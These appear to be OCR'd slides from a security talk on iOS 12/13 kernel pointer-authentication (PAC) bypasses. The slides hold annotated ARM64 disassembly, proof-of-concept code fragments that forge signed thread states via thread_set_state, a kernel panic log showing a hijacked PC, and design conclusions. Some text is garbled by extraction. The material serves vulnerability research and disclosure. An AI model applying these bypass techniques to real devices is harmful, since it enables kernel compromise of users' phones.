|                                                                                                                                                                                                                            | - 昭 く 〉 칠 pa                                                                                                                                         | c_bypass_6 〉 🛄 pac 〉 👩 kernel_call.c 〉 No Selection                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                        |
| <ul> <li>pac_bypass_6</li> <li>app</li> <li>kernel</li> <li>oob_timestamp</li> <li>pac</li> <li>kernel_call.h</li> <li>kernel_call.c</li> <li>pac_bypass.h</li> <li>pac_bypass.c</li> <li>ppl</li> <li>Products</li> </ul> | 64<br>65<br>66<br>67<br>68<br>69<br>70<br>71<br>72<br>73<br>74<br>75<br>76<br>77<br>78<br>79<br>80<br>81<br>82<br>83<br>84                           | <pre>struct overwrite_state *state3 = (struct overwrite_state *) data;<br/>struct overwrite_state *state2 = (struct overwrite_state *) (state3 + 1);<br/>struct arm64e_saved_state *state1 = (struct arm64e_saved_state *) (state2 +<br/>// Initialize EROP.<br/>state1-&gt;flavor = ARM_SAVED_STATE64;<br/>state1-&gt;pc = ADDRESS(BR_X25);<br/>state1-&gt;cpsr = KERNEL_CPSR_DAIF;<br/>state1-&gt;lr = ADDRESS(exception_return);<br/>state1-&gt;x[16] = 0;<br/>state1-&gt;x[17] = 0;<br/>state1-&gt;x[25] = ADDRESS(STR_X9_X3_STR_X8_X4_RET);<br/>state1-&gt;x[9] = kernel_state + overwrite_offset;<br/>state1-&gt;x[3] = kernel_state + offsetof(struct arm64e_saved_state, x[0]);<br/>state1-&gt;x[8] = ADDRESS(memmove);<br/>state1-&gt;x[2] = kernel_state;<br/>state1-&gt;x[2] = kernel_state;<br/>state1-&gt;x[2] = kernel_state;<br/>state1-&gt;x[2] = kernel_state;<br/>state1-&gt;x[2] = sizeof(*state2);<br/>state1-&gt;x[2] = sizeof(*state2);<br/>state1-&gt;x[2] = sizeof(*state2);</pre> |                                        |
| + 🕞 Filter                                                                                                                                                                                                                 | [+] thread_se<br>[+] Modified<br>[+] Thread is<br>[+] Set regis<br>[+] Thread is<br>[+] thread_se<br>[+] Resumed n<br>[+] thread_se<br>[+] PAC bypas | et_state thread 1 enter<br>et_state thread 0 enter<br>preempted thread state<br>s spinning on the spinning gadget<br>ster state for the signing gadget<br>s spinning on the signing gadget<br>et_state thread 0 exit<br>normal execution<br>et_state thread 1 exit                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         | ······································ |

#### Bypass #6: Interrupts during thread state signing

machine\_thread\_state\_initialize

| • • • |                                      |
|-------|--------------------------------------|
| LDR   | X0, [X19,#thread.upcb] ; arm_context |
| CBZ   | X0, loc_FFFFFFF007CD2A34             |
| MOV   | W2, #0 ; cpsr                        |
| MOV   | x1, #0 ; pc Interrupts during        |
| MOV   | x3, #0 ; 1r thread state signing     |
| MOV   | x4, #0 ; x16 are unsafe              |
| MOV   | x5, #0 ; x17 are unsale              |
| BL    | sign_thread_state                    |

• • •

## Bypass #7: Interrupts during PACIA

- Another variant of the same bypass
- Interrupts are not just problematic for sign\_thread\_state()

#### \_bcopyin

| • • • |                            |  |  |
|-------|----------------------------|--|--|
| MRS   | X10, TPIDR_EL1 ;; thread   |  |  |
| ADRL  | X3, copyio_error           |  |  |
| ADD   | X11, X10, #thread.recover  |  |  |
| MOVK  | X11, #0x1E02,LSL#48        |  |  |
| PACIA | X3, X11                    |  |  |
| LDR   | X11, [X10,#thread.recover] |  |  |
| STR   | X3, [X10,#thread.recover]  |  |  |
|       |                            |  |  |

• • •

## Bypass #7: Interrupts during PACIA

• Another variant of the same bypass

haanvir

. . .

Interrupts are not just problematic for sign\_thread\_state()

- EL1 exception vectors spill LR to memory
- LR read back before sign\_thread\_state()
- Overwrite spilled LR before signature is generated

|                 | _vector_long                            |  |  |  |
|-----------------|-----------------------------------------|--|--|--|
| MSR             | SPSel, #0 ; SP_ELO                      |  |  |  |
| SUB             | SP, SP, #0x350                          |  |  |  |
| STP             | <pre>X0, X1, [SP,#arm_context.x0]</pre> |  |  |  |
| •••             |                                         |  |  |  |
| STP             | X29, X30, [SP,#arm_context.x29]         |  |  |  |
| • • •           |                                         |  |  |  |
| В               | fleh dispatch64                         |  |  |  |
|                 | _                                       |  |  |  |
| fleh dispatch64 |                                         |  |  |  |
| STP             | <pre>X2, X3, [X0,#arm_context.x2]</pre> |  |  |  |
|                 | _                                       |  |  |  |
| MOV             | X1, X30 ; pc                            |  |  |  |
| MOV             | W2, W23 ; cpsr                          |  |  |  |
| LDR             | X3, [X0, #arm context.lr] ; lr          |  |  |  |
| MOV             | X4, X16; x16                            |  |  |  |
| MOV             | X5, X17 ; x17                           |  |  |  |
| BL              | sign thread state                       |  |  |  |
|                 |                                         |  |  |  |

- EL1 exception vectors spill LR to memory
- LR read back before sign\_thread\_state()
- Overwrite spilled LR before signature is generated

```
el1 sp0 fiq vector long
            SPSel, #0 ; SP ELO
    MSR
            SP, SP, \#0x350
    SUB
    STP
            X0, X1, [SP, #arm context.x0]
    . . .
            X29, X30, [SP, #arm context.x29]
    STP
    • • •
    в
            fleh dispatch64
fleh dispatch64
            X2, X3, [X0, #arm context.x2]
    STP
    . . .
            X1, X30 ; pc
    MOV
    MOV
            W2, W23 ; cpsr
            X3, [X0, #arm context.lr] ; lr
    LDR
            X4, X16 ; x16
    MOV
            X5, X17 ; x17
    MOV
             sign thread state
    BL
```

spin\_while\_zero
LDR X1, [X0]
CBZ X1, spin\_while\_zero
RET

















Reading parameters from memory before sign\_thread\_state() is always insecure

```
el1 sp0 fiq vector long
            SPSel, #0 ; SP ELO
    MSR
            SP, SP, \#0x350
    SUB
    STP
            X0, X1, [SP, #arm context.x0]
    . . .
            X29, X30, [SP, #arm context.x29]
    STP
    • • •
    в
            fleh dispatch64
fleh dispatch64
            X2, X3, [X0, #arm context.x2]
    STP
    . . .
            X1, X30 ; pc
    MOV
    MOV
            W2, W23 ; cpsr
            X3, [X0, #arm context.lr] ; lr
    LDR
            X4, X16 ; x16
    MOV
    MOV
            X5, X17 ; x17
    BL
            sign thread state
```

#### Switch context

| CBNZ  | X1, have_continuationno_need_to_save |  |  |  |  |
|-------|--------------------------------------|--|--|--|--|
| LDR   | X3, [X0,#thread.kstackptr]           |  |  |  |  |
| STP   | X16, X17, [X3,#arm_context.x16]      |  |  |  |  |
| STP   | X19, X20, [X3,#arm_context.x19]      |  |  |  |  |
| • • • |                                      |  |  |  |  |
| STP   | X29, X30, [X3,#arm_context.x29]      |  |  |  |  |
| • • • |                                      |  |  |  |  |
| MOV   | X0, X3 ; arm_context                 |  |  |  |  |
| LDR   | X1, [X0,#arm_context.pc] ; pc        |  |  |  |  |
| LDR   | W2, [X0,#arm_context.cpsr] ; cpsr    |  |  |  |  |
| MOV   | X3, X30 ; lr                         |  |  |  |  |
| MOV   | X4, X16 ; x16                        |  |  |  |  |
| MOV   | X5, X17 ; x17                        |  |  |  |  |
| BL    | <pre>sign_thread_state</pre>         |  |  |  |  |
| •••   |                                      |  |  |  |  |

RET

#### Switch context

| CBNZ  | <b>X1</b> , have_continuationno_need_to_save |                      |  |  |  |  |
|-------|----------------------------------------------|----------------------|--|--|--|--|
| LDR   | X3, [X0, #thread.kstackptr]                  |                      |  |  |  |  |
| STP   | <pre>X16, X17, [X3,#arm_context.x16]</pre>   |                      |  |  |  |  |
| STP   | <pre>X19, X20, [X3,#arm_context.x19]</pre>   |                      |  |  |  |  |
| • • • | _                                            |                      |  |  |  |  |
| STP   | <b>X29, X30, [X3,#arm_context.x29]</b>       |                      |  |  |  |  |
| • • • | _                                            | PC and CPSR are read |  |  |  |  |
| MOV   | X0, X3 ; arm_context                         |                      |  |  |  |  |
| LDR   | X1, [X0,#arm_context.pc] ; pc                | from memory before   |  |  |  |  |
| LDR   | W2, [X0,#arm_context.cpsr] ; cpsr            | signing              |  |  |  |  |
| MOV   | X3, X30 ; lr                                 | 6 6                  |  |  |  |  |
| MOV   | X4, X16 ; x16                                |                      |  |  |  |  |
| MOV   | X5, X17 ; x17                                |                      |  |  |  |  |
| BL    | sign_thread_state                            |                      |  |  |  |  |
| • • • |                                              |                      |  |  |  |  |
|       |                                              |                      |  |  |  |  |

- Switch\_context() manages thread states for voluntary kernel context switches
  - PC and CPSR are not needed/used

- While thread is active, write arbitrary PC+CPSR into its saved state blob
- Switch\_context() is called, reads PC+CPSR, signs them into the saved state
- Use the saved state for an exception return with arbitrary PC+CPSR

There's a bigger issue here...

## Design issue

- Fundamentally, there are 2 ways that signed thread states are used
  - 1. During exception return, via exception\_return
  - 2. During kernel thread context switch, via Switch\_context()
- These uses have different security requirements
  - exception\_return to EL1 needs PC, CPSR, LR protected
  - exception\_return to ELO only needs CPSR protected
  - Switch\_context() only needs LR protected
- Since thread states can be used in 2 different ways, thread states signed for Switch\_context() should not be usable by exception\_return and vice versa
- But there's only one sign\_thread\_state()...
  - Thread states signed for one purpose can be swapped and used for the other

- Fundamental issue: Thread state signed by Switch\_context() for context switching (which does not care about PC+CPSR) can instead be used for exception returns (which do)
- What about the inverse?

#### Bypass #10: Swapping user & kernel thread states

- thread\_set\_state() syscall can be used to set registers for user threads
- CPSR is restricted to ELO, but LR is unrestricted
  - Could place a kernel pointer in user LR; it would just fault
- Interacts poorly with
   Switch\_context(), which
   uses LR but ignores CPSR

```
thread_state64_to_saved_state()
```

### Bypass #10: Swapping user & kernel thread states

- Thread A: Block thread A by sending a Mach message to a filled Mach port
- Thread A: Register state is saved by Switch\_context()
- Thread B: Set thread\_A->user\_state = thread\_A->kernel\_state
- Thread B: Call thread\_set\_state(thread\_A) to set kernel\_state's LR to an arbitrary address and sign
- Thread B: Unblock thread A by receiving a Mach message on the filled port
- Thread A: Switch\_context() to A causes a RET to the arbitrary address

100% reliable and deterministic



Kernel

User

mach\_msg()

Thread A

swap\_user\_to\_kernel\_state()
thread\_set\_state()

Thread B































#### DEMO

<

#### panic-full-2020-07-13-154101....

רוח

"build" : "iPhone OS 13.3 (17C54)", "product" : "iPhone12,3", "kernel" : "Darwin Kernel Version 19.2.0: Mon Nov 4 17:46:45 PST 2019; root:xnu-6153.60.66~39\/RELEASE ARM64 T8030", "incident" : "16B1713C-3032-43E2-BFC7-9C03FD643DF7", "crashReporterKey" : "bc51922c773e3ee642f1e730544045c6bd181e49", "date" : "2020-07-13 15:40:59.61 -0700", "panicString" : "panic(cpu 1 caller 0xffffff029d6f6dc): PC alignment exception from kernel. at pc 0xffffff04242424242, lr 0xffffff042424242 (saved state: 0xfffffe066ff35a0)\n\t x0: 0xfffffe000d21a90 x1: 0xdbfbd5702978191c x2: 0xfeedfacefeedfacf x3: 0x610544894c8839cc\n\t x4: 0xfffffe066c18000 x5: 0x00000000000000 x6: 0x000000000000000 x7: 0x000000000000000\n\t x8: 0x00000000000000001 x9: 0x00000000000000 x10: 0xfffffe000d21a90 x11: 0xffffff049133510\n\t x12: 0x000000000000000 x13: 0x000000000000001 x14: 0xfffffe000d21a90 x15: 0x00000000000000000\n\t x16: 0x00000000000000000 x17: 0x000000000000000 x18: 0x000000016fb5b0e0 x19: 0x0000000000000000\n\t x20: 0x0000000000000000 x21: 0x00000000000000 x22: 0x00000000000000 x23: 0x00000000000000000\n\t x24: 0x0000000000000000 x25: 0x00000000000000 x26: 0x00000000000000 x27: 0x000000000000000000 lr: 0xffffff042424242 sp: 0xffffffe066ff38f0\n\t pc: 0xffffff042424242 cpsr: 0xa04003c4 esr: 0x8a000000 far: 0xfffffff042424242\n\nDebugger message: panic\nMemory ID: 0x6\nOS version: 17C54\nKernel version: Darwin Kernel Version 19.2.0: Mon Nov 4 17:46:45 PST 2019; root:xnu-6153.60.66~39\/ RELEASE\_ARM64\_T8030\nKernel UUID: 25C048C5-E304-3E2E-BC84-6DF0B4E21F63\niBoot version: iBoot-5540.60.11\nsecure boot?: YES\nPaniclog version: 13\nKernel slide: 0x000000021ba8000\nKernel

| 🕨 👘 🚧 oob_timestamp 🔪 🎢 Generic iOS Device | Finished running pac_bypass_10 on bazad-p0-iphone12,3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           | + +                                                                  |       |
|--------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------|-------|
| E 🛛 🗔 Q 🛆 🗇 🎟 🗗 🛱 🕻 🕻                      | 睯 pac_bypass_10 〉 🛅 app 〉 📩 ViewController.m 〉 No Selection                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |                                                                      | ≣0 ⊡  |
| signed<br>thread-                          | <pre>// Fill the port. Trying to send one more after this will bloc<br/>send_message(receive_port);<br/>// Create the thread, which will try to send a message and blo<br/>pthread_t pthread;<br/>pthread_create(&amp;pthread, NULL, pthread_func, NULL);<br/>while (thread_port == 0) {}<br/>uint64_t thread = 0;<br/>kernel_ipc_port_lookup(current_task, thread_port, NULL, NULL,<br/>printf("thread 0x%x -&gt; 0x%11x\n", thread_port, thread);<br/>// Sign the kernel thread state (kstackptr) via the userspace<br/>uint64_t upcb = kernel_read64(thread + 0x450);<br/>uint64_t kstackptr = kernel_read64(thread + 0x450);<br/>uint64_t kstackptr = kernel_read64(thread + 0x478);<br/>kernel_write64(thread + 0x450, kstackptr);<br/>uint64_t sp = kernel_read64(kstackptr + 0x100);<br/>arm_thread_state64_t state = {1r = 0xffffff042424242,<br/>thread_set_state(thread_port, ARM_THREAD_STATE64, (thread_stat<br/>ARM_THREAD_STATE64_COUNT);<br/>kernel_write64(thread + 0x450, upcb);<br/>printf("signed kstackptr +hread state with kernel LR\n");<br/>printf("thread-&gt;kstackptr-&gt;lr: %0161lx\n", kernel_read64(ksta<br/>// Receive the message to jump to the LR.<br/>printf("resuming thread\n");<br/>receive_message(receive_port);</pre> | ock.<br>&thread);<br>thread_set_state(<br>sp = sp };<br>e_t) &state, |       |
| + 🖲 Filter 🕚 🖾 All Output                  | ≎                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               | 🗑 Filter                                                             | 🖞 🗖 🗖 |



# iOS kernel PAC bypasses

|                                      | iOS 12 | iOS 13 |
|--------------------------------------|--------|--------|
| PAC signing gadget                   | 1      | 1      |
| PAC bruteforce gadget                | 1      |        |
| Thread state signing gadget          | 2      | 2      |
| Unprotected indirect branch          | 1      |        |
| Implementation bug                   | 1      |        |
| Reusing signed states (design issue) |        | 2      |

### More thorough analysis could have helped

- PAC still feels quite ad hoc in iOS 13
  - What is the formal security model?
  - There might be a few fundamental issues remaining
- iOS 12: Apple fixed the POCs, but not the underlying issue
  - Interrupts were explicitly called out as attack vectors
- Important to look at the compiler output
  - Some issues don't appear in the C code
  - Pop the kernel into your favorite disassembler

# PAC is still a good mitigation

- PAC as an exploit mitigation is independent of PAC as kernel CFI
- It has been quite successful at limiting exploitability of certain bug classes
  - Force attackers to use better bugs
- Lots of untapped potential in data PAC
  - Promising improvements in iOS 14

## Kernel PAC bypasses are not that important

- In the world of LPE, a kernel PAC bypass seems like the cherry-on-top
- Perhaps an expensive upcharge when selling an exploit?
  - Used to maintain legacy implants that rely on kernel function calls?
- But kernel CFI is not the last line of defense keeping your device safe
  - Hardening the kernel is still more important for end user security